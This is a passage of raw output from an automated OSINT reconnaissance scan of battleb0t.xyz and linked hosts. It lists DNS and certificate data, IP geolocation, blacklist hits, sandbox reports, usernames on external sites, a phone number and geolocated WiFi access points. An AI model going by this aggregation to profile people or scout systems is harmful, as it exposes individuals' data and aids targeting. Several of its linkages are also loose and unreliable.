Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Eminent_5G (Net ID: 00:14:5C:91:C2:74) | 50.8897, 6.0563 |
| 2023-05-12 03:00:51 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.77): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/withat_4.jpg | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Airport ST FRA (Net ID: 00:02:2D:07:C4:ED) | 50.1188, 8.6843 |
| 2023-05-12 02:45:25 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://github.com/twbs/bootstrap/blob/master/license)', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/h5bp/html5-boilerplate/blob/master/src/css/main.css', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://espressif.github.io/esptool-js/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3628"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_e2c_IE_EarlyTabStart_0x76c_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_e2c_ConnHashTable<3628>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_e2c_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_e2c_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n 
"IsoScope_e2c_IE_EarlyTabStart_0x76c_Mutex"\n "IsoScope_e2c_IESQMMUTEX_0_303"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "104.18.11.207:443"\n "151.101.1.229:443"\n "142.250.191.42:443"\n "142.250.189.234:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ajax.googleapis.com"\n "cdn.jsdelivr.net"\n "espressif.github.io"\n "fonts.googleapis.com"\n "maxcdn.bootstrapcdn.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "* Copyright 2011-2019 Twitter, Inc." 
(Indicator: "dir "; File: "bootstrap.min_1_.css")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"esp-logo_1_.png" has type "PNG image data 200 x 200 8-bit/color RGB non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "xterm.min_1_.js" has type "data"- [targetUID: N/A]\n "crypto-js_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "bootstrap.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "jquery.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "bootstrap.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00003628]\n "esp-logo_1_.png" has type "PNG image data 200 x 200 8-bit/color RGB non-interlaced"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: 
[%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003628]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF89E15DF29DBA29AC.TMP" has type "data"- Location: [%TEMP%\\~DF89E15DF29DBA29AC.TMP]- [targetUID: 00000000-00003628]\n "~DF11E296B765867100.TMP" has type "data"- Location: [%TEMP%\\~DF11E296B765867100.TMP]- [targetUID: 00000000-00003628]\n "~DFDF1C77609DE36ABC.TMP" has type "data"- Location: [%TEMP%\\~DFDF1C77609DE36ABC.TMP]- [targetUID: 00000000-00003628]\n "~DFE2D69294CDF7FEC7.TMP" has type "data"- Location: [%TEMP%\\~DFE2D69294CDF7FEC7.TMP]- [targetUID: 00000000-00003628]\n "favicon_1_.ico" has type "MS Windows icon resource - 3 icons 16x16 32 bits/pixel 32x32 32 bits/pixel"- [targetUID: N/A]\n "index_1_.js" has type "Java source ASCII text"- [targetUID: N/A]\n "_4D0457A1-EE71-11ED-B780-080027413500_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._4D04579F-EE71-11ED-B780-080027413500_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_54818866-EE71-11ED-B780-080027413500_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "urlref_httpsespressif.github.ioesptool-js" has type "HTML document ASCII text"- [targetUID: N/A]\n "xterm_1_.css" has type "ASCII text"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "PZPOVD2E.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\PZPOVD2E.txt]- [targetUID: 00000000-00003628]\n "LC3EP32V.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\LC3EP32V.txt]- [targetUID: 00000000-00003628]\n "OOO5AMX1.txt" has type "ASCII text"- Location: 
[%APPDATA%\\Microsoft\\Windows\\Cookies\\OOO5AMX1.txt]- [targetUID: 00000000-00003628]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "css_1_.css" has type "ASCII text"- [targetUID: N/A]\n "KXCE27YI.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\KXCE27YI.txt]- [targetUID: 00000000-00003628]\n "ZDDLZ4C8.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZDDLZ4C8.txt]- [targetUID: 00000000-00003628]\n "2YDQ0988.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2YDQ0988.txt]- [targetUID: 00000000-00003628]\n "Z9ELHG1D.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\Z9ELHG1D.txt]- [targetUID: 00000000-00003628]\n "esptool-js_1_.htm" has type "HTML document ASCII text"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://espressif.github.io/esptool-js/"\n Pattern match: "https://espressif.github.io"\n Pattern match: "https://espressif.github.io/esptool-js"\n Pattern match: "8cu.mP/n9kjk@$x8qf.3|`,gC/?\'.75ee&-S9ZQPB=z8`VLf&*c,VVkyg=/4Q?Ecr`u:ml35&sDTF!F@nm.A"\n Pattern match: "https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css"\n Pattern match: "https://github.com/chjj/term.js"\n Pattern match: 
"SUIDmicrosoft.com/9216302719590431032051132555703631031934MUID1D8C8FE0DEC66C4D23ED9CECDF8A6DCCmicrosoft.com/1025315968512031110405132555703631031934_EDGE_Vmicrosoft.com/9216315968512031110405132571328631031934SRCHDAF=NOFORMmicrosoft.com/1024332378944031085"\n Pattern match: "SUIDmicrosoft.com/9216302719590431032051132555703631031934MUID1D8C8FE0DEC66C4D23ED9CECDF8A6DCCmicrosoft.com/1025315968512031110405132555703631031934SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743SRCHUIDV=2&GUID=426377958C8445E3B4EA69482"\n Pattern match: "SUIDmicrosoft.com/9216302719590431032051132555703631031934SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743SRCHUSRDOB=20220131mi"\n Pattern match: "https://fonts.gstatic.com/s/orbitron/v29/yMJMMIlzdpvBhQQL_SC3X9yhF25-T1nyGy6BoWg1.woff"\n Pattern match: "9216315968512031110405132915078631031934MUID2F6B3FECBAF36563318B2CE0BB7764BEmsn.com/1025315968512031110405132915078631031934"\n Pattern match: "MUIDB1D8C8FE0DEC66C4D2 | 185.199.111.153 |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 6 | 0 | None | United States | clientify.net |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Vero (Category: art)
https://vero.co/login | login |
| 2023-05-12 02:56:52 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:78:81:e1:ef:49:4b:f9:6d:c5:16:34:0e:55:ab:d5:12:44
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 09:44:02 2022 GMT
Not After : Feb 15 09:44:01 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:c5:28:ae:be:17:84:18:1b:e1:bf:c2:45:52:c1:
a5:6a:08:4a:bc:c1:e3:a4:de:5e:d0:05:9f:d6:99:
22:94:16:f7:d2:69:68:71:09:4a:62:e7:41:0d:0a:
be:3e:3b:51:6d:0b:4a:0f:76:3a:b0:8e:cb:56:a6:
21:8f:de:9f:c1:45:ea:d1:38:90:03:24:5c:77:6f:
cd:06:86:05:00:ae:fc:49:fe:8f:e8:85:de:e7:e4:
d0:99:c5:ad:e4:c5:9c:9a:95:9e:97:20:79:ed:7e:
c1:65:47:a7:ce:2c:b4:2b:9e:4c:1f:8e:21:8f:4e:
cf:f7:3e:4f:ff:b2:88:aa:90:dd:b7:be:8a:db:d2:
17:66:cc:6f:09:3d:67:e8:3c:91:39:a6:90:69:62:
e9:f2:9c:b4:d3:ba:96:0b:b2:0e:b2:74:eb:8a:64:
f6:d7:18:6c:22:f7:1e:bc:17:2f:20:0c:dc:30:1b:
5e:7d:a8:0b:34:ce:8a:75:55:4f:72:8b:d6:d7:dc:
63:55:19:dd:2a:a0:25:0a:50:bd:17:df:74:d9:8e:
df:7b:ba:19:b8:f5:47:fd:97:bf:18:2b:99:ec:f3:
58:72:eb:64:34:43:28:b7:d3:7f:de:05:80:58:fb:
f6:05:86:02:1c:8d:eb:d5:23:a1:08:9a:01:84:aa:
05:5a:57:5b:4f:80:96:8a:65:18:8f:fb:bb:dd:91:
f1:8e:b1:05:2f:76:93:8f:28:86:73:78:5c:d4:fe:
b8:81:83:79:71:79:e9:31:46:fb:22:a9:30:c3:0b:
03:79:d0:e6:24:cf:e4:e0:cb:3e:91:71:20:ec:40:
44:0f:22:88:b4:5a:5f:cd:f2:41:b7:a9:21:3e:74:
54:3b:a0:07:32:4e:5c:e7:71:a3:33:95:bd:ee:27:
4a:b2:53:d1:06:de:2c:39:7b:83:7f:1c:cf:0a:28:
32:ef:07:d4:d3:ef:a5:9d:8a:8a:36:97:d5:6f:97:
57:8e:aa:22:4e:6c:70:6c:aa:43:59:1c:d0:88:a6:
26:22:1b:20:62:45:6e:6e:62:40:f6:bf:20:b1:b8:
43:17:25:80:1d:c9:c1:63:ed:d3:a8:bc:4b:68:5d:
f2:19:96:37:4a:82:70:a9:86:22:f6:56:84:02:f9:
b4:a7:6c:3d:03:4c:59:fe:71:81:0a:71:7e:9e:7c:
1a:5d:b6:ce:77:db:f9:80:a5:2d:65:a3:96:1f:c9:
ca:a0:c7:b0:9d:21:28:db:1c:6a:4c:c7:37:20:39:
9f:b7:63:e2:80:c5:2d:53:fd:3e:c8:1a:cf:e7:76:
9f:bc:92:4a:58:81:84:d1:30:a4:4e:12:c7:e5:10:
eb:dc:59
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
75:02:8B:49:76:96:40:2E:6F:D7:49:80:B9:AF:AD:08:D3:5D:F2:26
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
29:76:7a:56:81:b0:95:01:3f:0a:9d:7d:c4:e5:17:5f:14:64:
31:1f:ff:e8:89:b7:73:d0:e5:48:95:94:90:79:71:5f:5e:bd:
11:57:2e:35:46:0a:d0:46:0d:68:f1:c5:7a:ea:d2:5c:76:4c:
32:7a:df:e5:15:1f:4c:85:80:9e:03:4d:56:80:ad:4b:2c:6b:
b1:00:96:20:ff:02:5c:fe:b3:6b:a4:df:10:d7:1a:34:e6:05:
8a:93:ce:43:93:43:f0:21:83:34:dd:3b:5d:cd:02:a2:f7:69:
01:e6:a2:9d:c4:0a:00:06:c9:25:8d:66:34:7e:e7:56:fc:96:
0c:11:f2:15:8e:1b:ee:a8:bc:70:25:91:eb:fa:be:46:78:f9:
43:e5:48:f9:88:3a:38:53:b4:c2:e1:83:7c:30:6a:d7:b6:1a:
08:51:7a:03:5c:ed:3d:25:45:1e:03:b4:ab:40:92:83:1a:fd:
41:7d:5f:d2:40:54:63:0d:0f:36:db:fd:2f:13:eb:5b:2e:6b:
08:c3:7d:13:ce:a1:6a:1d:ba:e8:54:c7:19:87:ff:c8:d8:2e:
77:d7:9f:17:34:29:b1:63:1a:a3:70:9f:2d:0d:32:ff:45:66:
9c:81:e8:0c:a2:cc:74:6a:75:0f:61:f4:74:74:89:88:86:e3:
ba:d0:68:2d
|
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | wattpad (Category: social)
https://www.wattpad.com/user/ayshoo | ayshoo |
| 2023-05-12 03:11:17 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 2 | 0 | None | {u'city': u'Amsterdam', u'security': {u'is_vpn': False}, u'city_geoname_id': 2759794, u'region_geoname_id': 2749879, u'country': u'Netherlands', u'region': u'North Holland', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'CLOUDFLARENET', u'isp_name': u'Cloudflare, Inc.', u'organization_name': u'CloudFlare, Inc.', u'autonomous_system_number': 13335}, u'continent_code': u'EU', u'currency': {u'currency_name': u'Euros', u'currency_code': u'EUR'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/NL_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/NL_flag.png', u'unicode': u'U+1F1F3 U+1F1F1', u'emoji': u'\U0001f1f3\U0001f1f1'}, u'postal_code': u'1012', u'longitude': 4.8975, u'country_code': u'NL', u'timezone': {u'abbreviation': u'CEST', u'gmt_offset': 2, u'is_dst': True, u'name': u'Europe/Amsterdam', u'current_time': u'05:11:16'}, u'latitude': 52.3759, u'country_geoname_id': 2750405, u'continent_geoname_id': 6255148, u'country_is_eu': True, u'ip_address': u'188.114.96.1', u'continent': u'Europe', u'region_iso_code': u'NH'} | 188.114.96.1 |
| 2023-05-12 03:11:26 | Physical Location | No | AbstractAPI | 0 | 0 | 3 | 0 | None | Arizona, United States | +14806242599 |
| 2023-05-12 02:45:34 | Raw DNS Records | No | DNS Raw Records | 0 | 0 | 1 | 0 | None | battleb0t.xyz. 300 IN TXT "v=spf1 include:_spf.mx.cloudflare.net ~all" | battleb0t.xyz |
| 2023-05-12 02:54:13 | HTTP Status Code | No | Web Spider | 0 | 1 | 1 | 0 | None | 403 | ayhu.xyz |
| 2023-05-12 03:01:29 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.39): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:41 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Content_Length": "DISPLAY_UTF8", "X_Nf_Request_Id": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Content_Length": ["0"], "X_Nf_Request_Id": ["01H06QWFV48ACFBYY7E5EAJW1H"], "Server": ["Netlify"]} | 104.196.30.220 |
| 2023-05-12 03:33:44 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | !22222222222222222222222222222222222222222222222222
sH GN
t5ad
C'Y2z
OB:`S
pF>oj
OQTeuy
YYK`s
gnqV
N9FX6
EQY66
1pO'94
pj'R7pz`
0Kdes
xnj $
Zx<g?
X2r:z
T/z`A
G'?QN
$RpG9
Vdrnr1
mP0>Lc
1RNG\T
Uwp9'
YYWvz
Ru?wnz
a$$cp
m?/_J
kFpFv
2OAMYI
``VZH
.NGAM
yG`<c
lr@?L
h`NFx
@JgR
I?w<f
E BY8
<7LqQH
jLbFC0
.jG30
<.Y@O
sY_kV$
`-vSX
OOjLp
1D!@
ww P'
vOpjN
0?.qOY
1UONy
8nGqXW0
cQ2-c
5RG8 H
Gb:UW
HIRA
?q'fq
7aG'x
R`k xPW
HC$vf
P2W$g
FNGP3
:TerT
:sP1U
qhoSo
'wwEU
o_ZiP
nbO\qS
.Ojvv
EUbNTrI
5mPdRF
Df9`q
JVfrI
r0r3SF
j0AbHa
oBwg>
COv!FO9
XM.Iz
I@V98
1QH@bG'8
.A`A<
i2wpIa
5 b V
.0G5NR1
H`ePs
!?36H
j9c!A
t4.Vel
U\D!I
H09'q
Nj\JL
fE''p
Ilg4
<dRIa"
pFH'q'
i9'9?
uO_Z\
XiH`G
$pqJwd
n5px$
6GzyU | https://pics.battleb0t.xyz/images/random_2.jpeg |
| 2023-05-12 03:01:33 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.94): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:45:40 | Physical Coordinates | No | AbstractAPI | 94 | 0 | 2 | 0 | None | 34.0544, -118.244 | 185.199.111.153 |
| 2023-05-12 02:44:04 | Raw Data from RIRs | No | Tool - WAFW00F | 0 | 0 | 1 | 0 | None | [{"url": "https://battleb0t.xyz", "firewall": "Fastly", "detected": true, "manufacturer": "Fastly CDN"}, {"url": "https://battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] | battleb0t.xyz |
| 2023-05-12 02:44:40 | Affiliate - Domain Name | No | DNS Resolver | 2 | 0 | 4 | 0 | None | googleusercontent.com | 220.30.196.104.bc.googleusercontent.com |
| 2023-05-12 03:01:44 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.234): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:01:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.126): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:26 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | ow.ly (Category: social)
http://ow.ly/user/Altpapier | Altpapier |
| 2023-05-12 02:54:15 | Linked URL - External | No | Web Spider | 2 | 0 | 3 | 0 | None | https://github.com/Altpapier/SkyHelperAPI/issues | https://nwapi2.battleb0t.xyz/ |
| 2023-05-12 03:24:21 | HTTP Headers | No | Web Spider | 10 | 0 | 2 | 0 | None | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fiT%2Fr8CwWrAQPZkt8VpkeQoVoGOR6HuHPRasaTPIcW93tfGJar9pTikOfGdSWQA5SZHUpCyuk56gghqLlY9yU5dVDbV5Bs9yRYYuQ0D9hZe3tyWEFUstq9XRCg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c594cb34339-EWR", "cross-origin-opener-policy": "same-origin"} | https://ayhu.xyz/lol.html |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | * OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE NAMESPACE LITERAL+ AUTH=PLAIN AUTH=LOGIN] Dovecot ready.
| 87.248.157.102 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | UECTouch (Net ID: 00:18:0A:7A:D6:B0) | 32.8608, -79.9746 |
| 2023-05-12 02:54:17 | Netblock IPv6 Membership | No | Censys | 0 | 0 | 4 | 0 | None | 2606:4700:3037::/48 | 2606:4700:3037::6815:470e |
| 2023-05-12 03:03:29 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0036labs.github.io |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | AG-EA (Net ID: 00:13:33:91:70:BC) | 40.2024, 29.0398 |
| 2023-05-12 03:09:55 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | dgn.keyubu.com | 87.248.157.105 |
| 2023-05-12 03:01:35 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.122): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | My Passport (2.4 GHz) - 0778A5 (Net ID: 00:00:C0:07:78:A5) | 37.780462,-122.390564 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:FA:75:55) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:45:31 | Malicious IP Address | Yes | PhishStats | 0 | 1 | 2 | 0 | None | Phishstats [185.199.110.153]
| 185.199.110.153 |
| 2023-05-12 02:54:38 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 172.67.168.252:2087 | 172.67.168.252 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | pgi50 (Net ID: 00:01:21:10:7A:10) | 37.7813933,-122.3918002 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | XPONENT (Net ID: 00:02:6F:C6:43:88) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:13:10 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [01101101.github.io]
https://www.openphish.com/feed.txt | 01101101.github.io |
| 2023-05-12 02:50:15 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 18, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://base32check.org/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3280:120:WilError_01"\n "Local\\SM0:2564:304:WilStaging_02"\n "Local\\SM0:2564:120:WilError_01"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:3280:304:WilStaging_02"\n "Local\\SM0:3280:120:WilError_01"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3280:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5760:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "widevinecdm.dll" as clean (type is "PE32+ executable (DLL) (console) x86-64 for MS Windows")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': 